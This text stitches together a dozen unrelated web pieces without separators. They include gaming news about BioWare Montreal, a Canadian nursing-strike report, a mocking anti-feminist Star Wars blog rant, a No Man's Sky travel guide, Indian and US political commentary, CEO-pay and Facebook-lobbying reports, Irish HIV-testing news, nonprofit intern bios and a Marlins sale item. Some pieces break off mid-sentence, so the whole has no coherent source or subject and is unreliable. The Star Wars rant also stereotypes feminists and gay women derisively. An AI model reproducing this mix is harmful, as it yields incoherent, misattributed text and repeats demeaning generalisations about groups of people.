Two months after Mass Effect: Andromeda launched to dismal critical reception, reports from Kotaku's Jason Schreier indicate EA down-sized BioWare Montreal, the studio that made the game, and put the Mass Effect series on hiatus. The remaining BioWare developers were then spread out across EA Motive and BioWare's core Edmonton division to help work on the latter's new IP, Anthem, the reports continue. Now EA has officially confirmed the fate of its Montreal studio, validating the reports from May of this year.
While discussing R&D spend in a recent quarterly earnings call, EA Chief Financial Officer Blake Jorgensen said BioWare Montreal has been moved into the EA Motive studio to help Jade Raymond's team develop a new IP.
"We're building out a new studio in Montréal, as we've told everyone. And we've hired over 100 people into that studio that are brand-new to EA. This is to build the new IP around Jade Raymond's team that she's been building. I was in that studio last month. And it's a wonderful new addition to our team. And we brought our BioWare Montréal team into that same facility. So they now all sit in one new studio together," Mr. Jorgensen said during the call.
As we expected, EA's top executives didn't discuss the fate of the Mass Effect series, nor did they talk about the new Dragon Age game that's in development.
EA reported record first quarter earnings and growth for fiscal Q1'18, and you can read the numbers here.
Not long ago, I was at a dinner with the chief executive of a large bank. He had just had to decide whether to pull out of Italy, given the weak economy and the prospect of a future euro crisis.
The C.E.O. had his economists project out a series of downside scenarios and calculate what they would mean for his company. But, in the end, he made his decision on the basis of values.
His bank had been in Italy for decades. He didn't want Italians to think of the company as a fair-weather friend. He didn't want people inside the company thinking they would cut and run when times got hard. He decided to stay in Italy and ride out any potential crisis, even with the short-term costs.
He wasn't oblivious to data in making this decision, but ultimately, he was guided by a different way of thinking. And, of course, he was right to be. Commerce depends on trust. Trust is reciprocity coated by emotion. People and companies that behave well in tough times earn affection and self-respect that is extremely valuable, even if it is hard to capture in data.
Nursing students at the University of Ottawa who take many of their courses through Algonquin College say they're being treated like second-class students as Ontario's college faculty strike nears the end of its fourth week.
There are two separate streams that students entering the school of nursing at the University of Ottawa are placed in. Students in the mainstream program take all their courses at the university, while those in the collaborative program take a combination of courses at the university and at Algonquin College.
The courses they take, requirements to graduate and the bachelor of nursing degree they end up with are the same, including to whom they pay tuition: the University of Ottawa.
I feel like we're being treated as if we're second-class. - Tori Dawson, second-year student in the collaborative nursing program
But students in the college stream feel left behind by the university because they're missing out on classes, labs and clinical placements during the strike, while those in the other stream aren't.
"We feel very forgotten and pushed aside. And with us trying to reach out to the university, they're not reaching back and [giving] us any support," said Tori Dawson, 20, a second-year nursing student in the collaborative program.
Dawson, the vice-president of Algonquin relations with the U of O's Undergraduate Nursing Student Association, said she takes three of her five required courses at Algonquin College's Woodroffe campus — courses that have been on hold since the strike began last month.
"They're saying, 'Just wait, just sit tight.' But we've been sitting tight for four weeks, and it's time for this to end."
Hundreds of U of O students affected
More than 12,000 faculty in Ontario walked off the job Oct. 16. The Ontario Labour Relations Board has scheduled a vote next week to end the strike, and the union is advising its members to vote no.
Dawson estimates there are more than 500 University of Ottawa students taking part in the collaborative program at the Woodroffe campus, with more attending Algonquin's Pembroke campus.
Those in their third and fourth years can't attend their clinical placements, which are required to graduate and are on a strict schedule dictated by the hospitals, she said. They also would normally take all their courses through the colleges.
Dawson said she's contacted both the directors of nursing at Algonquin College and the University of Ottawa but has been dissatisfied with their responses.
More than 12,000 faculty at 24 colleges across Ontario walked off the job on Oct. 16. The strike is not only affecting college students but those in collaborative programs through universities as well. (Kimberley Molina/CBC)
'Treated as if we're second class'
"We are University of Ottawa students ... we're getting our degree from the University of Ottawa. We're paying our tuition to the University of Ottawa. But we're not getting any help from them," she said.
"I feel like we're being treated as if we're second class."
They're going to start their second semester whether we're done our first or not. - Geneviève Fillion , second-year student in the collaborative nursing program
The disparity between the university stream and collaborative stream has students wondering if they will have to repeat the year if they fall behind, said second-year student Geneviève Fillion.
"[The University of Ottawa] is not going to wait for us," said Fillion, 21. "They're going to start their second semester whether we're done our first or not."
The University of Ottawa said no one was available to comment Wednesday, but a statement would be forthcoming.
Another student in the collaborative program, Meagan Spoerri, 26, started a petition Wednesday afternoon calling for the university to step up and assist students in the collaborative nursing program.
By Wednesday night, it had garnered more than 540 signatures and comments, including from people who identified themselves as parents of students in the program.
Dozens of programs affected
There are around 100 collaborative programs that exist between universities and colleges across Ontario and which are affected by the strike.
In addition to the nursing program, two other programs at the University of Ottawa — digital journalism and public relations — are done in collaboration with Algonquin College, as are four programs at Carleton University.
The affected Carleton programs include interactive multimedia and design, network technology, information resource management and phototonics and laser technology, which are all part of the bachelor of information technology degree.
I'm starting to really look forward to this movie, whereas a few days ago I couldn't have cared less about it. If seeing it and enjoying it will piss off some feminists, count me in.
--------------------
What do we thing of feminists???
From COTRI must have masochistic tendencies, because every now and then something compels me to check out what kind of madness is being spewed over at Everyday Feminism dot com, which is one of the most mock-worthy websites in existence.When I visited that site today, I wasn't disappointed. I went looking for wack, and HOLY MOTHER OF CRAP did I ever get it.Because you guys, the crazy feminists over there are genuinely concerned about the new Star Wars movie coming out this Christmas, because of stuff like - and I'm not making this up - the lack of QUEER REPRESENTATION IN THE FILM. (they probably mean, lack of lesbians, since feminists are mostly that, not that there's anything wrong with that , LOL.)You can read the crazy for yourself, or simply avoid giving traffic to that bastion of stupidity and read this summary. Because Imma bout to summarize the crazy for y'all.Here are the reasons that the feminists are worried about the new Star Wars movie.1. It "heavily excludes women and people of color." Now, while they readily admit the presence of women and people of color in the original films (Billy Dee Williams, Samuel L Jackson, Carrie Fisher, Natalie Portman) - that isn't good enough, because some of them die and stuff. And how dare women and black people die in movies. THE OUTRAGE.Worse, Princess Leia and Padme look really good in the prior films, what with Leia in her metal bikini and doughnut hair and Padme in her beautiful and ornate costumes. And we can't have women looking beautiful in films, you guys. THAT IS SO TOTES SEXIST. AND, even though Leia is in charge of the rebel forces, she also saves her man, which is like so completely a show of weakness on her part. Or something.2. Women don't get to use the force enough. I can't even believe I'm having to write that, but this is the kind of stuff feminists are concerned with, y'all. They're concerned that Leia ONLY got to use some "mild telepathy" at the end of Empire Strikes Back. It is unacceptable to feminists that the women in Star Wars don't get to play with light sabres more.3. Women are like, totally objectified. Objectification, the feminists say, "“has been linked to problems with mental health, eating disorders, body-shame, self-worth and life satisfaction, cognitive functioning, motor functioning, sexual dysfunction, access to leadership, and political-efficacy.” And Carrie Fisher told NPR once that her metal bikini didn't even conform to her skin very well, so Boba Fett could see her bits when he was behind her OH NOES!I'm sure Carrie Fisher was beaten into submission on that set, forced against her will to don that bikini OR ELSE. Same reason she's happily appearing in the new Star Wars. She probably just doesn't understand her role in the patriarchy or something.The feminists are very upset that more people remember bikini-clad, doughnut-haired Leia than they do rebel commander Leia.Never mind that I remember handsome hot hunky Han Solo more than I remember whatever it is that Han Solo did in the movie. Apparently that doesn't matter, because feminist concerns never apply to men.But it gets worse, you guys.4. All films in the Star Wars series lack "queer" characters. (Pffft! lol.)HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA HA!I can't even.The feminists insist that since there are romantic plots in the Star Wars films, like between Anakin and Padme and Leia and Han Solo, well then by golly it should be a requirement that "queer" relationships get a spotlight in the movies too; especially, they say, in a movie featuring an imagined universe. Because transgender and queer folks "deserve representation in these imaginative space adventures."FOR REAL.5. RAAAAAAAAAAAAAAACISM! The Nemoidians look Asian-ish! Watto looks Jewish-ish! Jar Jar Binks looks Caribbean-ish! Oh noooooooooooes! The Stormtroopers are dark-skinned and tons of them get killed - and we can only cope with that much Stormtropper killing because of our racism. If they were white, there'd apparently be mass protests in the streets or something because we just would.not.be.able.to.deal.(Bunch of racists... In space, in a galaxy far far away, they don't have enough of those 3 boobs women, and spider people?)6. CLASSISM! The Jedi are all about protecting the rich and wealthy.Like I said, I'm not making this up. This is the level of insanity that I've come to expect from that crazy feminist website.Meanwhile,
I've been meaning to sit down and write an FAQ for both the Hub and No Man's Sky for a while. But, barring that, I've decided to start working on this guide instead. It will cover things that might not actually be part of an FAQ. When you want to go to the Galactic Hub, there are some key concepts you need to know right off the bat. A lot of this I've covered elsewhere, but not nearly as well organized. So, without further ado:
Things You Need To Know About
1. The “Galactic Hub” Is Not “The Center”
In fact, the Galactic Hub is roughly 166,000 RLY (explained below) away from the Center.
2. There's a Math Bug.
When talking about distances in No Man's Sky, everything involving interstellar travel uses Light Years. However, there's “Real Light Years” (RLY) which is mainly related to what the Galactic Map will tell you your “Distance To The Center” is. Thing is, this is not the same as “Linear Distance Light Years” (LDLY) which is the distance the Galactic Map says you are from any destination star you've selected.
In general, you can usually consider it: RLY*4 = LDLY
It's important to keep this in mind. Some utilities you might use in traveling to the Galactic Hub will report distances in one or the other. If the Pilgrim Star Path Website (PSPW) says you are “two hops” away from a destination, that's a LDLY value of between 1600 and 3200. However, it may tell you you're only 400-800 Light Years (RLY) away.
3. A Black Hole Always Moves You Closer To The Center.
Black Holes can be … utilized … to get you very close to the Galactic Hub … depending on where you're at. It's important to use the “Show Black Hole Ring” function on the PSPW to show you where a Black Hole might spit you out. It's a ring, because a Black Hole generally moves you 1500 – 2000 RLY closer to the Center … but randomly around the Center as well. So if you're 167,000 RLY from the Center, but on the other side of the Galaxy from the Galactic Hub, you're actually in prime position: a few rounds of “Black Hole Roulette” (explained below) might put you right in the middle of the Galactic Hub.
However, if you're already fairly close to the Center of the Galaxy, there's very little Black Holes will do for you, and if you're directly between the Center and the Galactic Hub, a Black Hole will just make the situation worse.
Finally, Black Holes do not appear to be accessible in “Creative” mode from what I've heard, so you'll have to just travel the old-fashioned way if you're in “Creative.”
4. There Are Three Saves (Unless You're In PermaDeath).
Every time you land on a planet, a Space Station, or your freighter (but not just any freighter – it has to be yours), it triggers a save, and moves the previous saves down one (the third drops off the bottom, forever lost as an option). This is important to know for Roulette.
PermaDeath has one save. There's no going back to an earlier version of your game when you play PermaDeath.
5. A Vast Majority Of The Players Are In “Normal” Mode.
And PS4, though there is a very sizable PC-Normal group as well. There are “Survival” mode residents, but they are very rare. It's important to note that “Survival” mode can change the planet generation rules for a given planet, making tags/labels in planet/system names incorrect for a different mode than what it was originally discovered in. At the very least, any non-desert planet with decent weather is going to have aggressive Sentinels. Always. And finally, bases are not shared between modes (or system platforms), so you need to know going in that if you're in “Survival” mode, you won't have as many shared base destinations as those of us in “Normal” mode.
6. It's Probably Better To Not Head There Right Away.
I strongly recommend doing the Atlas Path (not 100% important; Nada can tell you how to find what the Altas Path will allow you to see) and completing all of your Milestones first (welcome to the Hell of trying to find every animal on 10 planets, or the grind of Hyperjumping 60 times). Talk to Polo at the Anomaly – he's the only way to get the Theta Hyperdrive Upgrade; he'll also give you the Atlas Passes and the other two Hyperdrive Upgrades along the way. Even with the most ideal starting placement, getting all of your Hyperdrive Upgrades will make traveling to the Galactic Hub a lot easier, because it's highly unlikely that Black Holes will do it for you alone.
But … let's just say you've gotten that all out of the way …
“I'm Ready To Make The Trip!”
Praise Lord Pahefu, Master Of Mapping
So important I'm linking it twice, Pahefu wrote two mapping utilities, and the important one for this guide is the Pilgrim Star Path Website (PSPW). You feed it your coordinates and it tells you where you are when compared to the Center, the Hub, and the Pilgrim Star.
“How Do I Get My Coordinates?!”
You should be able to build (with a bit of Iron and Platinum) a Signal Booster. Once built, hover your reticle over it, and it should show you a sequence of five alphanumeric groups:
(In System Location):(x):(y):(z):(Solar Index)
The block with x, y, and z is the most important, but including the Solar Index allowed as well. The “In System Location” should be left off. x, y, and z point to your region in the Galaxy, and in the scales we're talking about, your “region” as accurate as we can get at this point. Feed the last three or Hexadecimal number groups (separated by colons) to the PSPW, and see where it says you are.
“I'm On The Other Side Of The Galaxy!”
Don't fret. Play “Black Hole Roulette”.
Go to a system with a Black Hole. Either find one in the Galactic Map (if you've done the Atlas Path) or ask Nada for a Short Cut. Land on the Space Station. This will cause you to – Get out of your ship. This sets up a save point. Get back into your ship, take off, go through the Black Hole. Land on a planet. This will shift your saves down one since it sets up a new save. Keep that in mind. Get your coordinates using a Signal Booster. Check them on the PSPW. Are you either within 50 hops or between the Center and the Hub? Start your journey from there. If you're not, load the save from #2 (should be the one in the middle of the three, not the most recent). IMPORTANT: GET BACK INTO YOUR SHIP. Now, proceed to step 2 …
It's important to note that if you are between the Center and the Hub, or extremely close to the Center, Black Holes will not help you – remember, they always move you closer to the Center.
Now, if you consider reloading an earlier save cheating, or you're in PermaDeath mode, the other option is to build a base in a Black Hole system, and use the Teleporter in the Space Stations to return in order to try again.
“Well, Now I'm Supposed To Go X Degrees From Center. What's Up With That?”
The Galactic Map is strongly lacking in navigational aids. The best we can do at this point is give you a “general” direction from where you're at compared to some easy to find location … like the big bright light at the Center.
Reprinted from an earlier post (Finding The Galactic Hub):
Of the five choices you have in the Galactic Map: Path To Center, Freeflight, Path To Waypoint, Path To Black Hole, and Atlas Path, four of them give you a line leading away from your current star to another hop. I've found it useful to:
Select one of those paths, but then orient myself towards the center. Make a guess as to what direction roughly (in degrees) the path is pointing relative to directly towards the center. Even the path to the center isn't going to always point “directly” to the center. It can be off by a significant amount. As an example, we'll use 20 degrees right for your next hop … Make another guess as to where that line should be pointing when I rotate around my current location to face the appropriate “degrees from center”. Spin round, still in the path mode. If the path to center was 20 degrees right, and you needed to go 180 degrees away from the center, the line should be pointing behind you to the left by 20 degrees. Go into free-flight and see how good your guess is.
For long distance traveling, all you're really worried about is going the general direction for a long hop.
That's Pretty Much It
I can't think of anything else I can add to this to explain what you need to know in order to get to the Hub with a minimum of fuss. However, if I get any suggestions or questions, I'll edit this post appropriately.
Ahead of Assembly poll, Ajit Pawar wants to eat ice-cream
Feature
oi-Sukant
By Sukant
Maharashtra Deputy CM Ajit Pawar's love for ice-cream has landed two PWD engineers in soup. The trouble began when Mr Pawar stopped for lunch in a State-run guest house in Aurangabad on his way to Jalna district of Maharashtra and created a scene when he was not offered Ice-cream for dessert.
This is one such bizarre incident which depicts the misuse of power by politicians and another example of NCP's arrogance. At a time when the Assembly elections are round the corner and with crushing debacle in the recent Lok Sabha poll, such crave for ice cream can land Mr Pawar in trouble.
Such incidents only show the VIP culture treatment of Indian politicians and as a result of not being offered ice-cream, show-causes notices were sent to two PWD engineers held responsible for it. Infact acts of goondaism and arrogance is nothing new for Ajit Pawar as in the past he has been caught on camera with a series of events.
Ahead of Lok Sabha polling, he was even caught on camera threatening to cut off water supply to villagers for not voting for his cousin Supriya Sule, the daughter of Nationalist Congress Party (NCP) chief Sharad Pawar. Mr Pawar is also facing allegations of over Rs 72,000 crore irrigation scam. Hardly two months away from Assembly election facing such allegations can only add more trouble to NCP. Maharashtra has seen a sharp decline in governance under Congress-NCP rule and such acts of arrogance only shows how insensitive the State administration has become.
incidents only show the VIP culture treatment of Indian politicians
The Opposition has seriously criticised Mr Pawar's arrogant behaviour. BJP leader Vinod Tawde was quoted as saying to NDTV, "I would've been happy if a district official not providing electricity to a village had been prosecuted, but taking such an action for not serving dessert is ridiculous."
Maharashtra is one such State where lack of water, electricity in rural areas and farmer's suicide is some of the biggest poll issue. But instead of addressing such issues if Mr Minister is busy cribbing for ice-cream than one can imagine the welfare of the State.
Ajit Pawar had even made headlines earlier when he asked a group of audience whether he should urinate into a dam to fill it. Pawar was made to pay a heavy price in the Lok Sabha election for such kinds of callousness.
Instead of chalking out a road map for Assembly election in the State, Maharashtra deputy CM is busy proving his arrogance which can only result in another debacle. There are various civic issue faced by the residents in Mumbai and the party should come up with solutions to most of the problems instead of focusing on small things like ice-cream.
Nearly 40 percent of the CEOs on the highest-paid lists from the past 20 years were eventually "bailed out, booted, or busted."
This 20th anniversary Executive Excess report examines the “performance” of the 241 corporate chief executives who have ranked among America's 25 highest-paid CEOs in one or more of the past 20 years.
The lavishly compensated CEOs we spotlight here should be exemplars of value-added performance. After all, sky-high CEO pay purportedly reflects the superior value that elite chief executives add to their enterprises and the broader U.S. economy.
But our analysis reveals widespread poor performance within America's elite CEO circles. Chief executives performing poorly — and blatantly so — have consistently populated the ranks of our nation's top-paid CEOs over the last two decades.
The report's key finding: nearly 40 percent of the CEOs on these highest-paid lists were eventually “bailed out, booted, or busted.”
The Bailed Out: CEOs whose firms either ceased to exist or received taxpayer bailouts after the 2008 financial crash held 22 percent of the slots in our sample. Richard Fuld of Lehman Brothers enjoyed one of Corporate America's largest 25 paychecks for eight consecutive years — until his firm went belly up in 2008.
The Booted: Not counting those on the bailed out list, another 8 percent of our sample was made up of CEOs who wound up losing their jobs involuntarily. Despite their poor performance, the “booted” CEOs jumped out the escape hatch with golden parachutes valued at $48 million on average.
The Busted: CEOs who led corporations that ended up paying significant fraud-related fines or settlements comprised an additional 8 percent of the sample. One CEO had to pay a penalty out of his own pocket for stock option back-dating. The other companies shelled out payments that totaled over $100 million per firm.
Over the past 20 years, we have seen no shortage of creative and practical proposals for reining in excessive executive compensation. Three pending reforms strike us as particularly urgent:
CEO-worker pay ratio disclosure: Three years after President Barack Obama signed the Dodd-Frank legislation, the SEC has still not implemented this commonsense transparency measure. The reform would discourage both large pay disparities that can harm employee morale and productivity and excessive executive pay levels that can encourage excessively risky behavior. Pay restrictions on executives of large financial institutions: Within nine months of the enactment of the 2010 Dodd-Frank law, regulators were supposed to have issued guidelines that prohibit large financial institutions from granting incentive-based compensation that “encourages inappropriate risks.” Regulators are still dragging their feet on this modest reform. Limiting the deductibility of executive compensation: At a time when Congress is debating sharp cuts to essential public services, corporations are able to avoid paying their fair share of taxes by deducting unlimited amounts from their IRS bill for the cost of executive compensation. Two bills, the Stop Subsidizing Multimillion Dollar Corporate Bonuses Act (S.1746) and the Income Equity Act (H.R. 199) would fix this outrageous loophole and significantly reduce taxpayer subsidies for excessive CEO pay.
VIDEO of this year's findings:
READ THE FULL REPORT [PDF]
Download the compensation data (.xlsx) for the top 25 highest paid CEOs each year from 1994-2013.
Explore all Executive Excess reports from 1994 onward.
People will soon be able to have a HIV test along with their cappuccino. Moves are under way to extend screening for the sexually transmitted disease to cafés, bars and even the workplace.
People will soon be able to have a HIV test along with their cappuccino. Moves are under way to extend screening for the sexually transmitted disease to cafés, bars and even the workplace.
The pilot project is getting €150,000 in funding. It aims to make it more convenient for at-risk groups in particular to be tested for HIV, with results available in around 20 minutes.
The move is part of the first National Sexual Health Strategy, which has been launched to stem the alarming rise in a range of sexually transmitted diseases through greater awareness, education and better access to testing.
Health Minister Leo Varadkar said: "The increase in sexually transmitted infections has raised concern among health professionals. Chlamydia has risen from 6.6 per 100,000 in 1995 to 136.5 in 2013."
There is also an increase in gonorrhoea and recent data shows HIV infection is on the rise again among younger gay men. Overall, the number of sexually transmitted disease notifications has risen from 3,361 in 1995 to 12,753 in 2013 - a rise of 279pc.
This is partly due to more testing but is also being linked to behaviour.
The most recent findings from Healthy Ireland, which provides a snapshot survey of lifestyle behaviours, revealed that 17pc of people who had sex with someone other than their partner did not use any form of contraception.
Doctors have also anecdotally noted the prevalence of these infections in middle-aged people who are separated or divorced and are not taking safety precautions as they move on to new and sometimes transient relationships later in life.
The rapid HIV testing pilot, which will be examined for quality control, will be run by the organisation Glen in Dublin and other support groups in Cork and Limerick. The test can be carried out without the need for a laboratory.
The minister said that it was hoped to bring down rates of sexually transmitted infection in the medium term. However, he noted that if more people are tested, the rates will rise.
"People who don't know they have a sexually transmitted infection are more likely to pass it on to others," he added.
The minister has appointed Dr Fiona Lyons, who has worked at the sexually transmitted disease clinic in St James's Hospital, to drive the strategy.
Dr Lyons said yesterday that there was a reluctance among many people to attend these clinics and some at-risk groups are losing out as a result of stigma and fear.
Greater education and awareness of prevention through proper sexual behaviour will also be incorporated into the Relationships and Sexual Education programmes in both primary and post-primary schools, which teaches young people life skills.
The strategy acknowledges that not all parents feel competent to provide good-quality sex education to their children.
The Department of Health is also to consider extending the HPV vaccine - which prevents sexually transmitted diseases which can lead to cervical cancer and is currently only available to girls - to adolescent boys.
Asked about funding, the minister said that the strategy had not been costed but would be supported from the health budget allocation for 2016.
Irish Independent
In Harry Potter and the Order of the Phoenix, Harry, Dumbledore, and the Order of the Phoenix have to work against Voldmort's Death Eaters in secret while the Ministry of Magic blinds itself to the needs of the wizarding world. Worse than simply doing nothing, however, the Ministry spreads anti-Potter propaganda in the newspapers, manipulates the law to target Potter and Dumbledore (who know Voldmort has returned), and in their refusal to acknowledge the problem, makes it just that much easier for Voldmort to secretly gain strength.
On March 31, the House of Representatives Committee on Science, Space and Technology held a hearing on the topic of climate change. It's clear from the hearing charter, the list of witnesses, and the large number of climate myths uttered that the GOP has become the Ministry of Magic to the Death Eaters of human-caused climate disruption.
No site has made this more clear than the climate science website Skeptical Science. The editor of the site, John Cook, analyzed the statements made by the various witnesses (which included a lawyer, an economist, and a marketing professor in addition to three actual climate scientists) and by the committee members themselves and has collected the myths they uttered into a list at his website.
There are a couple of things that are interesting to note about this list. The first is that the more than four dozen myths Cook identified have all been uttered before. All of them have been around for years, if not decades. And the scientific rebuttals to the unscientific myths have been around for just as long. This shows that climate disruption denial is not based on scientific principles, because if it were, then we'd see all kinds of new science in the literature, and lots of new “myths” for scientists to address. If the climate disruption denial movement isn't based on science, then the GOP majority of the House Committee on Science, Space and Technology is either ignorant of the science or blinded by its ideology. Given how many decades the world has known about the human causes of climate disruption, ignorance long ago failed to be a viable explanation.
Second, the person who uttered the most myths was actually a climate scientist, John Christy of the University of Alabama – Huntsville. It's interesting to note that Christy was a co-author of a paper (A comparison of tropical temperature trends with model predictions, doi 10.1002/joc.1651) that was completely discredited by a later paper (Consistency of modelled and observed temperature trends in the tropical troposphere, doi 10.1002/joc.1756) that proved beyond any doubt that the methods of Christy's paper were statistically meaningless. Christy and his co-authors have never admitted their error and retracted their paper, a sin that casts a pall over Christy's reputation and calls into question his scientific objectivity.
Third, the illegally published CRU emails (“Climategate”) were raised repeatedly by committee members and by the witnesses, and the comments made appear to ignore the fact that at least five separate investigations have cleared the scientists mentioned in the emails of any scientific misconduct, identified a single scientific figure that was not sufficiently well explained, and found that some of the scientists involved didn't properly handle information requests.
And fourth, the one witness invited by the Democratic minority, MIT climate scientist (and Republican) Kerry Emanuel, was the Albus Dumbledore of the hearing, telling all in attendance that Voldmort was real, the Death Eaters were responsible, and that the Ministry needed to accept reality before it was too late.
Of course, we all know how well that turned out for Potter and the Ministry alike.
POSTED April 16, 2015
We have our biggest class of interns this spring, which just goes to show that the movement of support for the North Korean people is constantly growing. Different people with different talents have come together to dedicate their energy to something they wholeheartedly believe in—liberty in North Korea. This blog is your chance to get to know the incredible, passionate interns who work behind the scenes to support the North Korean people.
Videographer interns: Annie and Julie
Growing up Annie didn't know much about North Korea except for what the media poorly portrayed, focusing only on its dictators and nuclear threats. After reading “Escape from Camp 14,” she knew that there was more to North Korea than what the media portrayed and wanted to delve deeper and educate herself more. Though born and raised in Torrance, CA, Annie graduated with a degree in film and digital media from the University of California, Santa Cruz. Annie is passionate about film and hopes to use it as a positive medium to help strengthen the voices of the North Korean people.
Julie has the unique ability to fall asleep in any position, especially while watching action movies. Born in South Korea, raised in Portland, Oregon, and hardened in New York City, she has continually encountered new cultures and people. At New York University, she studied media, culture, and communication where she mastered the skill of carrying cameras, boom poles, and c-stands simultaneously. She strongly believes that our stories can challenge the world, inform the masses and capture a simple smile. When she's not busy filming, she enjoys reminiscing about the time she almost sneezed on Hilary Clinton's shoulder.
Graphic design interns: Chia Min, Kez, and Tom
One summer day in Pyongyang, Chia Min and her North Korean tour guide mistakenly used the men's urinals and left with little boys staring at them. The big laughs and embarrassing shared moment with her North Korean tour guide made her realize that North Koreans are more than just “brainwashed puppets” of the regime. Motivated to join the movement, Chia Min took a semester off from the National University of Singapore where she is majoring in industrial design to fly all the way to California for an internship at LiNK.
Kez graduated with a degree from the School of Communication Design at Falmouth University, UK. She first heard of LiNK while researching North Korea for a book design project and jumped at the chance to apply for the perfect internship that combined her passion for the North Korean people and graphic design. Kez's middle name is Antarctica and her goal is to travel there soon!
Tom just recently graduated with a degree in graphic design from Teesside University in the United Kingdom. He can't remember the first time he learned about North Korea, but knows it was “Escape from Camp 14” that led him to learn about the work LiNK is doing. Tom recently volunteered at the Anne Frank exhibition for Holocaust Memorial Day where many of the children he spoke to expressed how glad they were such oppression wasn't happening anymore, but that made Tom think of the importance of LiNK's work. Tom is also known for collecting things most people wouldn't think to collect such as maps, train tickets from the UK, and receipts from other countries.
Social media intern: Laine
Laine, who graduated with a degree in German from Cal State Long Beach, calls LA home. She first found out about LiNK a couple of years ago through a past nomad via social media. After graduating from college, she decided to apply for an internship with LiNK and traveled the West Coast as a Pacific Northwest Nomad. Laine passionately believes in the work that LiNK does and that's why she couldn't be more thrilled to stay on as the social media intern this spring. One of her lifelong dreams is to open and manage a secondhand bookstore.
Translation intern: In
Originally from Incheon, South Korea, In moved to Utah as a teen and graduated years later from Brigham Young University with a degree in neuroscience. Ever since she watched a documentary on North Korean street children, the country and its people have had a place in her heart. In is passionate about women's and children's health, and dreams of one day becoming a doctor and working with North Korea's healthcare system. She was thrilled when she stumbled upon a LiNK van parked on campus and is very excited to join LiNK as a translation intern. In's name, In Kwon, means human rights in Korean.
U.S. resettlement assistance intern: Joan
Though Joan was born and raised in Southern California, her love of traveling brought her to more than 14 countries around the world. After graduating from the University of Southern California with degrees in political science and public policy, and planning and development, Joan knew she wanted to do work that made a difference in people's lives. She was so drawn to the work LiNK was doing to support the North Korean that she had to jump on board. Some of her favorite things are baking, trivia quizzes, rugby, hippos, and road trips.
Efficiency technologist intern: Julian
Julian graduated from The University of Texas at Austin where he was a member of the local Rescue Team, LiNK Texas, for five years. After watching the documentary “Inside North Korea,” he felt a deep connection with the North Korean people. Julian took several trips to South Korea to meet North Korean defectors and other organizations working on this issue. Now, he's returning to LiNK for his second internship where he hopes to help LiNK maximize its impact on this issue. One interesting fact about Julian is that he's never eaten meat.
HR & recruitment intern: Julie
Julie was born and raised in New York City, New York. She graduated with a degree in anthropology from SUNY Geneseo. It was in college that she became involved with LiNK by joining her college's Rescue Team where she got to meet many groups of Nomads before finally becoming one herself. Julie was a Great Plains Nomad last tour where she had the opportunity to travel to over 13 states speaking about the changes happening in North Korea. She never expected that she would return to LiNK, but loved the idea of taking charge in the recruitment process, aiming to get more people involved to support the North Korean people.
Booking intern: Shellie
Shellie graduated last spring with a degree in global studies from the University of Arizona. She first became passionate about North Korea when she watched an episode of Oprah showing the National Geographic documentary with Lisa Ling, “Inside North Korea”. Shellie knew that she had to do something, so when a friend in college told her about LiNK, she was ecstatic to become a part of this powerful movement for the North Korean people. She applied to be a Nomad after graduation, spent 10 weeks touring the southeast, and then decided to continue on as a booking intern for the spring. Fun fact: when she was a toddler, Shellie's dream job was to become Catwoman when she grew up.
Donor impact intern: Michelle
Michelle was born in Busan, South Korea and grew up in Daegu until she went to high school in Virginia. Michelle went to George Mason University and studied global affairs and international conflict analysis and resolution. She chooses to help the North Korean people because she wants to see the unification of her home country and the freedom of the North Korean people, who are in this situation due to geographical misfortune and greed. Michelle has an unhealthy obsession with animals, Star Wars (original trilogy), and Avatar: The Legend of Korra/The Last Airbender.
Rescue Teams interns: Hamaila and Kali
Coming from a military family, Hamaila never really had a hometown but the experience gifted her with a love of traveling instead. After seeing all 50 states and most of Europe, she just graduated with a degree in nutrition from the University of Texas in Austin. She hopes to follow her passion and obtain a master's in design soon. Pulling from her two years of experience at the LiNK Texas rescue team and her love of design, she will be serving as the Rescue Teams department's creative intern this semester.
Kali (pronounced ‘collie') has a passion to make real changes in peoples lives and has aspired to be an intern at LiNK ever since the Nomads came to her school in 2013. Before coming on as an intern, Kali started a Rescue Team at Ashland High School in Oregon and attended LiNK's Summit event. Now, Kali is thrilled to work with like-minded individuals who are standing with the North Korean people. If you were to look for Kali outside the office, you would find her dancing, eating chocolate or watching “New Girl.”
Tour relations intern: Julia
Born and raised in Toronto, Canada, Julia spent the past few years studying international development and psychology at Dalhousie University. Thanks to a development and activism course, Julia learned about the human rights crisis in North Korea and, for the past two years, she has been helping to lead a student group dedicated to raising awareness of the issue. She is constantly inspired by the courage and resiliency of the North Korean people and is thrilled to be escaping the Canadian winter to join the LiNK team as the tour relations Intern. Fun Julia facts: she has visited 35 countries and loves Abba music, farmers' markets, yoga, and snorkeling.
Feeling inspired to work with us? Give our fall internships a look!
Facebook wined and dined U.S. lawmakers and racked up a tab close to $4 million during 2012, an increase of 196 percent over its courting costs in the previous year.
According to disclosure forms, Facebook spent $1.4 million in the fourth quarter to lobby government officials on foreign relations matters, online privacy issues, data security, immigration reform, and online advertising.
The fourth-quarter lobby spend is Facebook's first $1 million-plus quarter; the $1.4 million figure is just $200,000 less than the company's combined lobbying costs for the first and second quarters of 2012. The bigger-by-the-month spending trend is sure to continue as the company pushes to expand its user base to kids under the age of 13, experiments with facial recognition technology, and gets more aggressive with its online and mobile advertising tactics.
"Our presence and growth in Washington reflect our commitment to explaining how our service works, the actions we take to protect the billion plus people who use our service, the importance of preserving an open Internet, and the value of innovation to our economy," a Facebook representative told CNET.
The more cynical view, of course, is that Facebook is buying its way to favorable laws that will allow it to do more with more member data. Consumer Watchdog, a nonprofit organization that exposes political injustice, holds this more extreme perspective.
"Google and Facebook would have you believe that they are different from other corporations. They are not. They are following the corrupt corporate tradition in Washington: buying what you want," the organization's privacy project director, John M. Simpson, said in a statement.
Simpson's right about one thing: tech companies are spending exorbitant sums to advance their agendas in Washington. In 2012, Google spent $16.48 million and Microsoft spent $8.09 million to lobby U.S. lawmakers.
Derek Jeter was nowhere to be found when Major League Baseball owners took up the franchise sale of the Marlins for the first time on Tuesday. It was lead investor and billionaire businessman Bruce Sherman who met with the ownership committee, one of the first official steps in the process.
“This was the first step of several more to come,” said Marlins president David Samson. “I think it's a process that you take seriously, and Bruce Sherman is taking it very seriously.”
If there are no hitches going forward and league owners give their final approval, Sherman and Jeter could be in full control of the team by the start of the offseason in early October.
Although he was absent from the quarterly owners' meetings, Jeter's presence was unmistakable.
Sign Up and Save Get six months of free digital access to the Miami Herald
